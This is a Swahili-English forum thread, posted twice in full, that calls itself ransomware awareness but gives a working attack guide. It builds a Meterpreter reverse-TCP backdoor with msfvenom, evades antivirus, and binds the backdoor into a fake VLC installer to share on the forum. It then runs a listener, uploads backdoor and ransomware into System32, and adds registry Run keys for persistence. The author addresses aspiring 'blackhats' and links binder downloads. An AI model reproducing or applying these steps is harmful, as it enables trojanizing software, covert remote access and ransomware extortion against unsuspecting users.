Thefreedom
JF-Expert Member
- Jan 27, 2019
- 319
- 316
Hey friend !!!! Thefreedom is hereeee.............
kama kawaida yangu ni kuwasaidia watu na kutoa angalizo kwa wale ndugu zangu ambao hawana uelewa na hacking + tech.
leo nitaongelea kitu kimoja ambacho naona kabisa watu hawa carei kabisa ...........
Leo lets discuss inakuaje mpaka data zako zinakuwa comprimissed na ransomewares au dangerous viruses wowote ambao watakuletea shida wewe ndugu msomajiii.
Na ni Kwa jinsi gani hackers wanaweza kupenya kwenye system yako au PC yako na kuweka makazi ya kudumu.........
before we start embu vuta picha kwenye situation hizi...
1) mfano unatumia PC ya ofisi ambayo ina report zako za mwezi ujao ambao unatarijia kusubmit >>>je ikiwa locked na strongest ransomwares utafanyajeeee...na hauna backup yyte je utakuwa kwenye hali gani??
2. wewe mwanafunzi au mfanyabiashara au mtumiaji wa kawaida ambaye unathamini data zako >>>itakuwaje siku ukilockiwa stuffs zako na hackers na wakidemand kiasi cha pesa ili files zako ziwe unlocked na ukiangalia maisha ya sasa hasa upande wa pesa na utafuatajii >>>>utafanyaje??
basi nikaona sio vema niwaoneshe na kuwafunza hii mambo kama mlio nitafuta PM na kunidonate niwe wazi kwenye haya maswala.......na ndivyo mimi nitakavyochukua jukumu hili kuonesha a real life of hacking < am hacking everything with purposes sio kwa kujifurahisha >
lets start................................................................
kwa wale ndugu zangu ambao hamjui maaaana ya RANSOMWARE???
Ransomware huyu ni malicious software ambaye kadizainiwa ku lock computer systems mpaka pale users au victim akilipa kiasi cha pesa ambacho mtengnezaji wa virus huyu amekiweka >>kwa lengo la kupata data zake ...
so unalipa kisha nakupa a key ya ku unlock data zako pale zikiwa locked >>>>easy
wale wa history tunasema this is like a barter trade (system) you give something ......yo gt service......
hivo basi leo nitawaonesha njia AMBAYOo ni famous sana ....inayotumika hata humu JAMII FORUMS NA BAADHI YA WATU........
requirements
1 Windows pc
2. linux installed kwenye pc yako
3. port forwading server >>> kama hauna router use this below
>>>>>ssh server link SSHReach.me
>>>>>portmap link Portmap.io - free port forwarding solution
>>>>> ipjetable.net
>>>>> DigitalOcean - Cloud Computing, Simplicity at Scale
4. my powerful binders download BINDER.zip - Shared with pCloud
5. kama victim ana antivirus unaweza encrypt backdoor na zirikatu (kwa wale upcoming blackhats ) au unaweza nifuatilia hapa mRanonyMousTZ - Overview soon nita upload framework coded by me.au unaweza add SSL certficate ukabind na backdoor use my code to generate SSL trusted cerificate below
root@kali:~#openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.random.com" -keyout random.key.pem -out random.crt
root@kali:~#cat random.key.pem random.crt > random.pem
After that you can erase the random.cert and random.key.cert.
root@kali:~#rm -f random.key.pem random.crt
baada ya hapo utatumia veil ku add custome SSL
HATUA ZINAZOFANYIKA
1. kutengeneza backdoor >>>>ila me ntatumia mfano wa kua attack targeted victim mfano nataka kumuattack ndugu yangu kali linux ........
fungua linux make a backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST="weka server ip au host name na hakikisha iko forwaded port" LPORT="weka port" -a x86 -f exe > /root/Desktop/backdoor.exe
hapo msfvenom itatengeneza backdoor na utaikuta kwenye desktop as backdoor.exe
sasa kwann nimetuma symbol kama -a na -f ?
-a means architecture na nimeweka 32 bit kwasababu hatakama victim akiwa 64 bit inaweza fanya kazi kuliko kutumia 64 bit alafu victim ana 32 bit >> hakika haitarun
-f means format>>>> target wetu ni windows PC (file.exe)
NOTE >> Kwa wale upcoming blackhats unaweza tumia zirikatu lakini hakikisha system yako umeinstall mono
Cross platform, open source .NET framework lasivyo hutoweza encrypt ur backdoor kwa most of antiviruses
how to installl it ?
kwa wale wa ubuntu use 18.04 (i386, amd64, armhf, arm64, ppc64el)
run>>>>>>sudo apt install gnupg ca-certificates
run >>>>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>>>>>>>run echo "deb Index of /repo/ubuntu stable-bionic main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>>>>>>>sudo apt update
UBUNTU 16.04 (i386, amd64, armhf, arm64, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>>echo "deb Index of /repo/ubuntu stable-xenial main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update
UBUNTU 14.04 (i386, amd64, armhf, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>> echo "deb Index of /repo/ubuntu stable-trusty main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update
WALE WA KALI LINUX EASY paste hii
sudo apt install mono-devel
2. hatua ya pili baada ya kuandaaa backdoor ni kwenda kubind na software yoyote ili nije kushare JAMII FORUMS
katika hatua hii ya kubind naomba udownload video ambayo nimeonesha all this shit inavyokuwa kwa kila hatua mwisho wa hii thread
hivo nitabind
3. baada ya kubind nachokifanya now ni kuanzisha listerner ambayo itakuwa inanipa feedback zote victim akirun our software ambayo baada ya kubind niiitaita VLC LATEST VERSION 2019
kumbuka hii backdoor kama umefuata hatua zote za ku encrpty haitokuwa detected hata victim akiscan na antivirus yoyote kwasababu ya signature na size..... ziko trusted
so katika terminal ya kali linux use this guide
start msfconsole just type "msfconsole" then
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost "weka serbver ambayo uliweka kwenye creation ya backdoor yako"
set lport "weka port"
set ExitOnSession false
kisha exploit -j
4. nitapost au kumtumia victim wangu ile VLC SOFTWARE na soon akinstall nitapata connection na pc yake na atakuwa hacked
HOW TO HACK PROCESSOR AND CREATE PERSISTENCE IN WINDOWS [ BLACKHAT ADVANCED]
persistence ni kitendo cha ku gain access yani tunataka kuwa na makazi ya kudumu kwenye pc ya huyu victim wetu for a lifetime .....sasa hapa lengo letu kubwa ni kwamba endapo victim akizima pc tunataka hata kama connection ikiwa closed lengo letu baadaye akiwasha pc awashe server yetu yeye mwenyewe na kurudisha connection >>>>THIS IS WHAT WE CALL PROCESSOR HACKING LETS SEEE
kuwa makini sana na ingekuwa vizuri utafute mda udownload my video below ili uone kwa macho yako....
soon endapo victim akinstall our backdoor iliyo nyuma ya VLC itakupa access ya kufanya chochote kwenye PC yake
sasa kitu muhimu na cha msingi ni kucheck permissions + UAC
type hii command kwenye meterpreter session yako >>> getprivs utaona permissions ulizo nazo as admin
pia ukitype getsystem >>>> utaona jina ulilopewa as administartor kwenye vixtim pc
ukitype hizo command usipo pata errors ur GOOD
na kama umetype umepate error basi nitawaletea uzi wa how to bypass UAC in advanced
sasa hatua inayofuata ni ku upload backdoor ileile + RANSOMWARE kwenye target machine
use this codes
upload /root/Desktop/backdoor.exe c:\\Users\\Public
upload /root/Desktop/ransomware.exe c:\\Users\\Public
hii /root/Desktop/backdoor.exe hii ni sehemu ambayo nimeweka exe software ambayo nitaipatch na processor ya huyu victim
na hii c:\\Users\\Public ni location ambayo itaenda kutua baada ya ku upload kwenye victim pc na tuna tumia \\ kwa sababu metasploit haitambui single back slash kwenye victim pc kwaiyo ukitaka oneshea location ya directory kwa victim we are using double back slash \\ ila tukiwa katika shell like CMD WE USE SINGLE \
now HIZO FILES zitakuwa uplaoded kwa victim remotely
hatua inayofuata kwakuwa tuna permission pia tuna upload kwenye system 32 bit mana tunataka victim akiwasha pc tupate a real permision kama yeye anavyokuwa kwenye pc yake so tutauplaod hizo backdoor + ransomware kwenye system32 pia use hii command
upload /root/Desktop/backdoor.exe c:\\Windows\\System32
upload /root/Desktop/ransomware.exe c:\\Windows\\System32
NOW we attacking processor
use this command
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\System32\\backdoor.exe
kishA press enter itakumbia SUCCEFFUL SET
kwa ransomware use same sema hakikisha majina ya hizo backdoor yafaanane na zile ulizo upload kwa target
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v ransomware -d C:\\Windows\\System32\\ransomware.exe
baaada ya hapo matokeo yake ni nini victim huyu akija kurestart pc atawasha connection na server + system yake itarun huyu virus atomatic as administrator
files zitakuwa locked na utakuwa na access naye.
okay guys unaweza jiuliza je hizi files tunazopeana JF inakuaje >?? me sina jibu ila kuwen makini
kwa wale ambao wangependa kuona hiii mambo inakuwaje kwa video download my presentation uone kila hatua hapa WINDOWS PERSISTENCE & PROCESSOR HACKING, UPLOAD RANSOMEWARES presentation BY THEFREEDOM BLACKHATS
Thefreedom
kama kawaida yangu ni kuwasaidia watu na kutoa angalizo kwa wale ndugu zangu ambao hawana uelewa na hacking + tech.
leo nitaongelea kitu kimoja ambacho naona kabisa watu hawa carei kabisa ...........
Leo lets discuss inakuaje mpaka data zako zinakuwa comprimissed na ransomewares au dangerous viruses wowote ambao watakuletea shida wewe ndugu msomajiii.
Na ni Kwa jinsi gani hackers wanaweza kupenya kwenye system yako au PC yako na kuweka makazi ya kudumu.........
before we start embu vuta picha kwenye situation hizi...
1) mfano unatumia PC ya ofisi ambayo ina report zako za mwezi ujao ambao unatarijia kusubmit >>>je ikiwa locked na strongest ransomwares utafanyajeeee...na hauna backup yyte je utakuwa kwenye hali gani??
2. wewe mwanafunzi au mfanyabiashara au mtumiaji wa kawaida ambaye unathamini data zako >>>itakuwaje siku ukilockiwa stuffs zako na hackers na wakidemand kiasi cha pesa ili files zako ziwe unlocked na ukiangalia maisha ya sasa hasa upande wa pesa na utafuatajii >>>>utafanyaje??
basi nikaona sio vema niwaoneshe na kuwafunza hii mambo kama mlio nitafuta PM na kunidonate niwe wazi kwenye haya maswala.......na ndivyo mimi nitakavyochukua jukumu hili kuonesha a real life of hacking < am hacking everything with purposes sio kwa kujifurahisha >
lets start................................................................
kwa wale ndugu zangu ambao hamjui maaaana ya RANSOMWARE???
Ransomware huyu ni malicious software ambaye kadizainiwa ku lock computer systems mpaka pale users au victim akilipa kiasi cha pesa ambacho mtengnezaji wa virus huyu amekiweka >>kwa lengo la kupata data zake ...
so unalipa kisha nakupa a key ya ku unlock data zako pale zikiwa locked >>>>easy
wale wa history tunasema this is like a barter trade (system) you give something ......yo gt service......
hivo basi leo nitawaonesha njia AMBAYOo ni famous sana ....inayotumika hata humu JAMII FORUMS NA BAADHI YA WATU........
requirements
1 Windows pc
2. linux installed kwenye pc yako
3. port forwading server >>> kama hauna router use this below
>>>>>ssh server link SSHReach.me
>>>>>portmap link Portmap.io - free port forwarding solution
>>>>> ipjetable.net
>>>>> DigitalOcean - Cloud Computing, Simplicity at Scale
4. my powerful binders download BINDER.zip - Shared with pCloud
5. kama victim ana antivirus unaweza encrypt backdoor na zirikatu (kwa wale upcoming blackhats ) au unaweza nifuatilia hapa mRanonyMousTZ - Overview soon nita upload framework coded by me.au unaweza add SSL certficate ukabind na backdoor use my code to generate SSL trusted cerificate below
root@kali:~#openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.random.com" -keyout random.key.pem -out random.crt
root@kali:~#cat random.key.pem random.crt > random.pem
After that you can erase the random.cert and random.key.cert.
root@kali:~#rm -f random.key.pem random.crt
baada ya hapo utatumia veil ku add custome SSL
HATUA ZINAZOFANYIKA
1. kutengeneza backdoor >>>>ila me ntatumia mfano wa kua attack targeted victim mfano nataka kumuattack ndugu yangu kali linux ........
fungua linux make a backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST="weka server ip au host name na hakikisha iko forwaded port" LPORT="weka port" -a x86 -f exe > /root/Desktop/backdoor.exe
hapo msfvenom itatengeneza backdoor na utaikuta kwenye desktop as backdoor.exe
sasa kwann nimetuma symbol kama -a na -f ?
-a means architecture na nimeweka 32 bit kwasababu hatakama victim akiwa 64 bit inaweza fanya kazi kuliko kutumia 64 bit alafu victim ana 32 bit >> hakika haitarun
-f means format>>>> target wetu ni windows PC (file.exe)
NOTE >> Kwa wale upcoming blackhats unaweza tumia zirikatu lakini hakikisha system yako umeinstall mono
Cross platform, open source .NET framework lasivyo hutoweza encrypt ur backdoor kwa most of antiviruses
how to installl it ?
kwa wale wa ubuntu use 18.04 (i386, amd64, armhf, arm64, ppc64el)
run>>>>>>sudo apt install gnupg ca-certificates
run >>>>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>>>>>>>run echo "deb Index of /repo/ubuntu stable-bionic main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>>>>>>>sudo apt update
UBUNTU 16.04 (i386, amd64, armhf, arm64, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>>echo "deb Index of /repo/ubuntu stable-xenial main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update
UBUNTU 14.04 (i386, amd64, armhf, ppc64el)
>>>sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF
>>>sudo apt install apt-transport-https ca-certificates
>>> echo "deb Index of /repo/ubuntu stable-trusty main" | sudo tee /etc/apt/sources.list.d/mono-official-stable.list
>>>sudo apt update
WALE WA KALI LINUX EASY paste hii
sudo apt install mono-devel
2. hatua ya pili baada ya kuandaaa backdoor ni kwenda kubind na software yoyote ili nije kushare JAMII FORUMS
katika hatua hii ya kubind naomba udownload video ambayo nimeonesha all this shit inavyokuwa kwa kila hatua mwisho wa hii thread
hivo nitabind
3. baada ya kubind nachokifanya now ni kuanzisha listerner ambayo itakuwa inanipa feedback zote victim akirun our software ambayo baada ya kubind niiitaita VLC LATEST VERSION 2019
kumbuka hii backdoor kama umefuata hatua zote za ku encrpty haitokuwa detected hata victim akiscan na antivirus yoyote kwasababu ya signature na size..... ziko trusted
so katika terminal ya kali linux use this guide
start msfconsole just type "msfconsole" then
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost "weka serbver ambayo uliweka kwenye creation ya backdoor yako"
set lport "weka port"
set ExitOnSession false
kisha exploit -j
4. nitapost au kumtumia victim wangu ile VLC SOFTWARE na soon akinstall nitapata connection na pc yake na atakuwa hacked
HOW TO HACK PROCESSOR AND CREATE PERSISTENCE IN WINDOWS [ BLACKHAT ADVANCED]
persistence ni kitendo cha ku gain access yani tunataka kuwa na makazi ya kudumu kwenye pc ya huyu victim wetu for a lifetime .....sasa hapa lengo letu kubwa ni kwamba endapo victim akizima pc tunataka hata kama connection ikiwa closed lengo letu baadaye akiwasha pc awashe server yetu yeye mwenyewe na kurudisha connection >>>>THIS IS WHAT WE CALL PROCESSOR HACKING LETS SEEE
kuwa makini sana na ingekuwa vizuri utafute mda udownload my video below ili uone kwa macho yako....
soon endapo victim akinstall our backdoor iliyo nyuma ya VLC itakupa access ya kufanya chochote kwenye PC yake
sasa kitu muhimu na cha msingi ni kucheck permissions + UAC
type hii command kwenye meterpreter session yako >>> getprivs utaona permissions ulizo nazo as admin
pia ukitype getsystem >>>> utaona jina ulilopewa as administartor kwenye vixtim pc
ukitype hizo command usipo pata errors ur GOOD
na kama umetype umepate error basi nitawaletea uzi wa how to bypass UAC in advanced
sasa hatua inayofuata ni ku upload backdoor ileile + RANSOMWARE kwenye target machine
use this codes
upload /root/Desktop/backdoor.exe c:\\Users\\Public
upload /root/Desktop/ransomware.exe c:\\Users\\Public
hii /root/Desktop/backdoor.exe hii ni sehemu ambayo nimeweka exe software ambayo nitaipatch na processor ya huyu victim
na hii c:\\Users\\Public ni location ambayo itaenda kutua baada ya ku upload kwenye victim pc na tuna tumia \\ kwa sababu metasploit haitambui single back slash kwenye victim pc kwaiyo ukitaka oneshea location ya directory kwa victim we are using double back slash \\ ila tukiwa katika shell like CMD WE USE SINGLE \
now HIZO FILES zitakuwa uplaoded kwa victim remotely
hatua inayofuata kwakuwa tuna permission pia tuna upload kwenye system 32 bit mana tunataka victim akiwasha pc tupate a real permision kama yeye anavyokuwa kwenye pc yake so tutauplaod hizo backdoor + ransomware kwenye system32 pia use hii command
upload /root/Desktop/backdoor.exe c:\\Windows\\System32
upload /root/Desktop/ransomware.exe c:\\Windows\\System32
NOW we attacking processor
use this command
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v backdoor -d C:\\Windows\\System32\\backdoor.exe
kishA press enter itakumbia SUCCEFFUL SET
kwa ransomware use same sema hakikisha majina ya hizo backdoor yafaanane na zile ulizo upload kwa target
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v ransomware -d C:\\Windows\\System32\\ransomware.exe
baaada ya hapo matokeo yake ni nini victim huyu akija kurestart pc atawasha connection na server + system yake itarun huyu virus atomatic as administrator
files zitakuwa locked na utakuwa na access naye.
okay guys unaweza jiuliza je hizi files tunazopeana JF inakuaje >?? me sina jibu ila kuwen makini
kwa wale ambao wangependa kuona hiii mambo inakuwaje kwa video download my presentation uone kila hatua hapa WINDOWS PERSISTENCE & PROCESSOR HACKING, UPLOAD RANSOMEWARES presentation BY THEFREEDOM BLACKHATS
Thefreedom


